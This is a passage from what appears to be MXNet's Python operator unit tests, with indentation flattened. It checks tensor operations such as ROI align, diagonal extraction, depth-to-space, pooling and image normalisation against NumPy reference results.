sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_device()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for _ in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'log_sigmoid', 'mish', 'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
